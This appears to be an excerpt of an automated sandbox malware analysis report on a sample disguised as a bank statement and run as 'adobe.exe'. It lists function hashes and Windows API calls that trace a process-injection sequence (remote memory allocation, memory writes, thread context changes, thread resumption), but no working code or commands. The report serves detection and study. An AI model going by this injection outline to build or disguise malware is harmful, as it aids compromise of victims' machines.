Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: b11b268397f00e5b47fd7cfc10bfae9b219cce125d709b56105bd07a8e8f6e07
Instruction ID: fcc8bdea85ecdb9d4ac95db47af76f45848beb430ff97d3afd61c43011927153
Opcode Fuzzy Hash: b11b268397f00e5b47fd7cfc10bfae9b219cce125d709b56105bd07a8e8f6e07
Instruction Fuzzy Hash: E751D570B002069FDB58EF28D594B6AB7E5FF84700F1485A8E4069F3A5EB34EC41CB91

Function 06B4A828 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

$^q, xrefs: 06B4A9AC
$^q, xrefs: 06B4AA04
$^q, xrefs: 06B4A959
$^q, xrefs: 06B4A9DB

Memory Dump Source

Source File: 00000003.00000002.4118157528.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6b40000_Statement JULY #U007e SEP 2024 USD 19,055.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: f9c214d393a4851aaccb921351e76d1a906adf25cd218a40eab84e214d73b307
Instruction ID: 9493be54d07ea250627b5a9af7ce4e52d600284e66c77af4b2f819752ba558db
Opcode Fuzzy Hash: f9c214d393a4851aaccb921351e76d1a906adf25cd218a40eab84e214d73b307
Instruction Fuzzy Hash: 7051CF70F502099FDFA9EE68D5806AEB3B2FF88300F1095A9D405AB359DB35DC42DB90

Analysis Process: adobe.exePID: 7916, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	274
Total number of Limit Nodes:	17

Executed Functions

Function 0549990C Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05499B4E

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 8c9beef58304047c2cbd4ad8be0ee51fab2095ef39d2b5b8dcc874507e425cc3
Instruction ID: 41478012bd2a77a332b7465ecf0510390441ff4d949fd55d08593befbb1228f8
Opcode Fuzzy Hash: 8c9beef58304047c2cbd4ad8be0ee51fab2095ef39d2b5b8dcc874507e425cc3
Instruction Fuzzy Hash: 23A16D71D04259DFDF14CFA8C846BEEBBB2BF48314F1481AAD809A7250DB749985CF92

Function 05499918 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05499B4E

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b1b771473ee3b0c26922d114bbe2af443e82e66da97d288dde20e46c96716731
Instruction ID: ca0bca6b6c61b1b485a47bf03786959e23788ec5cfdade68ab0602e48c1f7a41
Opcode Fuzzy Hash: b1b771473ee3b0c26922d114bbe2af443e82e66da97d288dde20e46c96716731
Instruction Fuzzy Hash: F1915C71D04219DFDF24CF68C846BEEBBB2BF48314F1485AAD809A7240DB749985CF92

Function 0537B0E8 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0537B33E

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 05f79f1b1b2cb2242917b6aa5c33a2c6d9a6425eba7e55e66394ae33ea01fd2d
Instruction ID: d41fb9053b4108a16ae7a0f9c2f4a8166b7e0e2f59ba2458b4e5a887b98489f7
Opcode Fuzzy Hash: 05f79f1b1b2cb2242917b6aa5c33a2c6d9a6425eba7e55e66394ae33ea01fd2d
Instruction Fuzzy Hash: E1713670A00B498FD724DF69D45479ABBF1FF88304F108A2DD48ADBA50EB78E945CB90

Function 05491264 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05494371

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 5cce9d85252806f3be5247c100dbc668d29b0f55078ebcb6a6ef10b7391a86b1
Instruction ID: 21e7e5c9db2cad09f18bb2e8ac9c8b85544a17064f985f26cdd74c4b94579b89
Opcode Fuzzy Hash: 5cce9d85252806f3be5247c100dbc668d29b0f55078ebcb6a6ef10b7391a86b1
Instruction Fuzzy Hash: 504108B5A00305CFDB18CF99C489AEABBF5FB89314F148459D519AB321D774A841CFA4

Function 05374248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 053759C9

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 85ff9e8ad7d7572c2e0221d0f4d0fd222ec05c978de3c41b46128de687f31b74
Instruction ID: 5e40b42c2ac1ed0189cac366fc6fe9172de5adc08e20020470337ab200a74209
Opcode Fuzzy Hash: 85ff9e8ad7d7572c2e0221d0f4d0fd222ec05c978de3c41b46128de687f31b74
Instruction Fuzzy Hash: E441AFB0C0061DCBDB24DFA9C984B9EBBF5BF49304F24806AD409AB255EB756946CF90

Function 0537590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 053759C9

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 722366d604c3ff90ffd13162a30217928aa8642543c7aff19c3e78b3a39cf6cf
Instruction ID: a41eba12466ff168b8e2afcf607f6af68790d5d85ef1ce14b32417231d56d384
Opcode Fuzzy Hash: 722366d604c3ff90ffd13162a30217928aa8642543c7aff19c3e78b3a39cf6cf
Instruction Fuzzy Hash: BA41B0B1C0061DCBDB24DFA9C884BDEBBF5BF49304F24806AD409AB255DB756986CF90

Function 0549966A Relevance: 1.6, APIs: 1, Instructions: 85
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05499720

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 830f79d632f52cf8d05a447025f96a778d0344338608213095247b5a7e74a13f
Instruction ID: 4728ebb84f6ce90055c44283a9fae21679499338945e763f32d80016f83d056a
Opcode Fuzzy Hash: 830f79d632f52cf8d05a447025f96a778d0344338608213095247b5a7e74a13f
Instruction Fuzzy Hash: B53158B69003599FCB14CFA9C885BDEBFB4BF48310F10842AE458A7240D7749954CBA0

Function 05499690 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05499720

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 78c8ec6cdb3f6b39d676e81d48937e77c84a4b4568d52ef89c53fcdc87f56ca5
Instruction ID: c699a7e0e2c10aea5e620ab58de09d00b80e5fb96f2e857110da7d994559f412
Opcode Fuzzy Hash: 78c8ec6cdb3f6b39d676e81d48937e77c84a4b4568d52ef89c53fcdc87f56ca5
Instruction Fuzzy Hash: 1D2146B59003499FCB14CFA9C885BDEBBF4FF48310F10842AE959A7240C7789954CBA4

Function 05499778 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05499800

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 57d4023cd3c8b5e3d43075259503eab083f598b45c6d904524109395f4308f7d
Instruction ID: 5db6bad84f9ecfd4a4af4c3c76d3fcb26d7394523903e4a89937e453cd3e7f68
Opcode Fuzzy Hash: 57d4023cd3c8b5e3d43075259503eab083f598b45c6d904524109395f4308f7d
Instruction Fuzzy Hash: EE2136B1C002599FCB10CFAAC881BDEBBF4FF48324F10842EE559A7250C7789944CBA4

Function 0537AFD4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0537D58E,?,?,?,?,?), ref: 0537D64F

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 40727f8901a050bdc54b54cd1ed52e2695cf798ea2957ad068ac305bdc6f514b
Instruction ID: b112833efa4fa9a263c540e98f7a2312131d56c8220be3f0f04ae3b8dcffdeb3
Opcode Fuzzy Hash: 40727f8901a050bdc54b54cd1ed52e2695cf798ea2957ad068ac305bdc6f514b
Instruction Fuzzy Hash: C021E5B5D002089FDB10CF99D584ADEBFF4EB48314F14841AE959A7350D378A954CFA4

Function 054990F2 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05499176

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 6211a918220f70e81572e204836a61d9c6fcadd1462404ae59fe1380bbc0934e
Instruction ID: ea9a5dbcb6c0ccb4bbc97f1e14fd0b6430848edba8a0ba3a9442435d06ac5db7
Opcode Fuzzy Hash: 6211a918220f70e81572e204836a61d9c6fcadd1462404ae59fe1380bbc0934e
Instruction Fuzzy Hash: EA2139B1D042098FDB14DFAAC4857EEBBF4FF88324F14842AD459A7240C7789945CFA5

Function 0537D5C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0537D58E,?,?,?,?,?), ref: 0537D64F

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: f3947b8d867a84e117b2b137ecc3a273a98fe388313e2f0f7b90204b6e2c24d1
Instruction ID: 9d0e47d79072066d44b58df3dc7d3a4aad474db7675c6327aeed98cbc0575831
Opcode Fuzzy Hash: f3947b8d867a84e117b2b137ecc3a273a98fe388313e2f0f7b90204b6e2c24d1
Instruction Fuzzy Hash: 0421E0B5D002189FDB10CFA9D984ADEBBF4FB48324F24841AE959A3350D378A954CFA4

Function 05499780 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05499800

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ef41247fa106945e9506348e5ed8a1fa3c028186a4b0d8b53fab2cdd88e826fb
Instruction ID: e822043abc5655fe47b1c32e3990182764f44502521c82bf7953f102abe9f235
Opcode Fuzzy Hash: ef41247fa106945e9506348e5ed8a1fa3c028186a4b0d8b53fab2cdd88e826fb
Instruction Fuzzy Hash: 9C2116B1C002599FDB10DFAAC841ADEBBF5FF48310F10842EE559A7250C7749544CBA4

Function 054990F8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05499176

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dbcb72349695100659c49d7398c38188f0ab623cab0ce335eadf11858c48c275
Instruction ID: 188a7d90a6e3043e0a5366fdc8f52d7862f5bb4f5e5a462e69d17bedae16e293
Opcode Fuzzy Hash: dbcb72349695100659c49d7398c38188f0ab623cab0ce335eadf11858c48c275
Instruction Fuzzy Hash: 392137B1D042098FDB14DFAAC4857EEBBF4BB88324F10842AD459A7240CB78A945CFA5

Function 054991CA Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0549923E

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 879514a78de5cee7f9ddb448df178218367d13a8a73238b329affaf1e86aa703
Instruction ID: 57c17a234ac7f71ba46cfd2451457ec3070f2b80ccc3dcf981750a08d7fef579
Opcode Fuzzy Hash: 879514a78de5cee7f9ddb448df178218367d13a8a73238b329affaf1e86aa703
Instruction Fuzzy Hash: BC1159718002499FDB14DFA9C845BDEFFF5EF88324F10881AE559A7250C775A544CFA4

Function 054991D0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0549923E

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1dd2bdb1b35307c224ecee1b0a9aff6d95adac68387bd1963786b3811c973f8e
Instruction ID: b520100bdb89202a81c3aaa72999f284b33961b1f54736b714d8f20176eb591b
Opcode Fuzzy Hash: 1dd2bdb1b35307c224ecee1b0a9aff6d95adac68387bd1963786b3811c973f8e
Instruction Fuzzy Hash: DD1156B18002488FDB14DFAAC845BDEFFF5EF88324F10881AE559A7250C775A544CFA0

Function 05499042 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 054990AA

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4df31f4d8b728a529a37f9594363329cfff5b4761f34efad1e610782643f8122
Instruction ID: 8ea14d95080089daf0af1267c4cbd7d3ef64d26f7e72139e21b70eab57645f2f
Opcode Fuzzy Hash: 4df31f4d8b728a529a37f9594363329cfff5b4761f34efad1e610782643f8122
Instruction Fuzzy Hash: A31158B1D002488BDB20DFAAC4457DEFBF4EB88324F24841AD559B7250CB79A944CF94

Function 05499048 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 054990AA

Memory Dump Source

Source File: 00000005.00000002.1801321356.0000000005490000.00000040.00000800.00020000.00000000.sdmp, Offset: 05490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5490000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ed9d2e527625de6470a6e04ecdbcdb4e8cc9a0ad4c7c9953bf5ce9294964a8f5
Instruction ID: f3cb4d21cfae386bbe4a4f0e0756126a8ae2cb857be556d8c4d8e94b326668b3
Opcode Fuzzy Hash: ed9d2e527625de6470a6e04ecdbcdb4e8cc9a0ad4c7c9953bf5ce9294964a8f5
Instruction Fuzzy Hash: 211136B1D042488FDB24DFAAC4457DEFFF4EB88324F20842AD559A7250CB75A944CFA4

Function 0537B2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0537B33E

Memory Dump Source

Source File: 00000005.00000002.1800832431.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5370000_adobe.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: e3ecf11d2bf66f4f18e1e8d57cb963dfd4015e1c79ad016f31340c82fa5c09f3
Instruction ID: 18c1deb92737b8d7ac6e9059b028a869a366c519665bad9863a53b22b76b2095
Opcode Fuzzy Hash: e3ecf11d2bf66f4f18e1e8d57cb963dfd4015e1c79ad016f31340c82fa5c09f3
Instruction Fuzzy Hash: 90110FB6C002498FEB20CF9AC444ADEFBF4EB88224F10842AD459A7210D779A585CFA1

Function 0118D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1799735057.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_118d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ef23baf5aca27d92ea6b9d82c6832827150752d01cdee522728bc0b318c55d
Instruction ID: 5075f4c21df7637e5a3374d742b2b5bb0fd6a393ae3aad96678a5fb2235b9080
Opcode Fuzzy Hash: 83ef23baf5aca27d92ea6b9d82c6832827150752d01cdee522728bc0b318c55d
Instruction Fuzzy Hash: 0C212271604300DFDF19EF98E9C4B26BFA5EB84314F20C66DD80A4B296C33AD447CA62

Function 0118D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1799735057.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_118d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 39721540dbbc6c72a01616421dccee5117b8e4d9e8ae0b4ede548a5f704d4717
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: B911A975504380CFDB16DF58E584B16BBA2FB84214F24C6AAD8494B696C33AD40BCFA2

Analysis Process: adobe.exePID: 7968, Parent PID: 7916COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	27
Total number of Limit Nodes:	4

Executed Functions

Function 06D62EA0 Relevance: 8.4, Strings: 6, Instructions: 931COMMON

Download Yara Rule

Strings

$^q, xrefs: 06D63B70
$^q, xrefs: 06D63B40
$^q, xrefs: 06D63B4C
$^q, xrefs: 06D63B17
$^q, xrefs: 06D63B23
$^q, xrefs: 06D63B64

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: dbb21c62101143edb247d932cc2ca64c48798061b1b1c073ef4f4d90668f4e25
Instruction ID: c01defbe99e711d7a0751029302f6c3a42a2ab888cbbc89208053866ee1b1971
Opcode Fuzzy Hash: dbb21c62101143edb247d932cc2ca64c48798061b1b1c073ef4f4d90668f4e25
Instruction Fuzzy Hash: AD825D34E106098FCB64DF69C584A9DB7F2FF89300F15D5A9E449AB265EB30ED85CB80

Function 06D66560 Relevance: .8, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd14ed44f02b871aeea9cbffd69dc873f4b319d03820a95ef82ed41bcbdbdbd
Instruction ID: bb3c73eee492277b79050f2892410be26e0577f0ac6fa3b36ff91ae9d375a506
Opcode Fuzzy Hash: cdd14ed44f02b871aeea9cbffd69dc873f4b319d03820a95ef82ed41bcbdbdbd
Instruction Fuzzy Hash: 9B62C130B102449FDB54DBA9D584BADB7F2EF88304F148469E406EB395DB35EC46CB82

Function 06D6B1A8 Relevance: .6, Instructions: 567COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f3f440725eb4147c98cdbe6e7664afa0b747aa751f94253bb0bb6648b795e3
Instruction ID: 4db6816379fe65f069cac1bbfcc2c072b2216d44181f74dd8b16c46ca819e3b9
Opcode Fuzzy Hash: f4f3f440725eb4147c98cdbe6e7664afa0b747aa751f94253bb0bb6648b795e3
Instruction Fuzzy Hash: F9225030E102098FDF64DBAAD5847AEB7F6EB49314F208827E449EB391CA35DC95CB51

Function 06D690C8 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06D69156
$^q, xrefs: 06D6911B
$^q, xrefs: 06D6910F
$^q, xrefs: 06D6914A

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 7a332089fb3d904c3247c4743513cd1ef5e85b9e363e1ed3e360db2ea18f593e
Instruction ID: c3baee58fd0a9fd4ebaf01928821152e3d03d84da0b3faf231cc1e3cfd8821a0
Opcode Fuzzy Hash: 7a332089fb3d904c3247c4743513cd1ef5e85b9e363e1ed3e360db2ea18f593e
Instruction Fuzzy Hash: E7914030B1020A9FDB54DB69D9647AEB7F6EBC8204F108569D409EB384EF74DC86CB91

Function 06D6CEC8 Relevance: 4.5, Strings: 3, Instructions: 798
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06D6D2BF
$^q, xrefs: 06D6D2D3
$^q, xrefs: 06D6D2C7

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 04661e40ab2765d829bbc784ab3d7e512cad484cf9ce9bcfc4847b8009c4b37c
Instruction ID: 21b0f9bb90a12440c6fcf75ea1d4eab8f0a374014fb3189f936dff111ed1ee08
Opcode Fuzzy Hash: 04661e40ab2765d829bbc784ab3d7e512cad484cf9ce9bcfc4847b8009c4b37c
Instruction Fuzzy Hash: BC624E30B102068FCB55DB69D590A5EB7F2FF84304F248A69D0099F369DB75ED8ACB81

Function 06D64B18 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 06D64C45
\Ocq, xrefs: 06D64CCF
fcq, xrefs: 06D65225

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 3ddb0b82bd14b487589e83ec2dcddf2e582344848cc48029543725c9b6615291
Instruction ID: df4b6a47c59a9f5d86b17d7c4fa9fa459df4b15a3b37308ae5299bf4f6d85379
Opcode Fuzzy Hash: 3ddb0b82bd14b487589e83ec2dcddf2e582344848cc48029543725c9b6615291
Instruction Fuzzy Hash: 29618D30F102099FEB559FA9D8547AEBAF2FF88700F208429E106EB395DF758C458B91

Function 06D67FF0 Relevance: 2.7, Strings: 2, Instructions: 248
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06D68035
$^q, xrefs: 06D68041

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 969f00320f84210fc748edc2fc395f07f06c5757c1d41c270b7096b6369c952e
Instruction ID: 1959686963d3e04109e88024002adfe916025e277edfdac9eaa3cc7c242c3121
Opcode Fuzzy Hash: 969f00320f84210fc748edc2fc395f07f06c5757c1d41c270b7096b6369c952e
Instruction Fuzzy Hash: BD91B130B102068FDB54DFBAD5906AEB7E2FF88204F148529E805DB395DB75DC86CBA1

Function 06D690BB Relevance: 2.7, Strings: 2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06D6910F
$^q, xrefs: 06D6914A

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: ec73ce2b921b598bcab93868451a16847b9714ac0995e90fe5f58b70fe58263a
Instruction ID: 5094d5d172e1918472d232c48b1d27fe27a350bff375f8d6497deeb901c7db89
Opcode Fuzzy Hash: ec73ce2b921b598bcab93868451a16847b9714ac0995e90fe5f58b70fe58263a
Instruction Fuzzy Hash: 44516330B101069FDB54DBB9D9A4BAF73F6EBC8644F108429D409DB384DA74DC42CB91

Function 06D6A318 Relevance: 2.6, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X!@, xrefs: 06D6A38B
x!@, xrefs: 06D6A3AC

Memory Dump Source

Source File: 00000007.00000002.1896000072.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6d60000_adobe.jbxd

Similarity

API ID:
String ID: X!@$x!@
API String ID: 0-2527372166
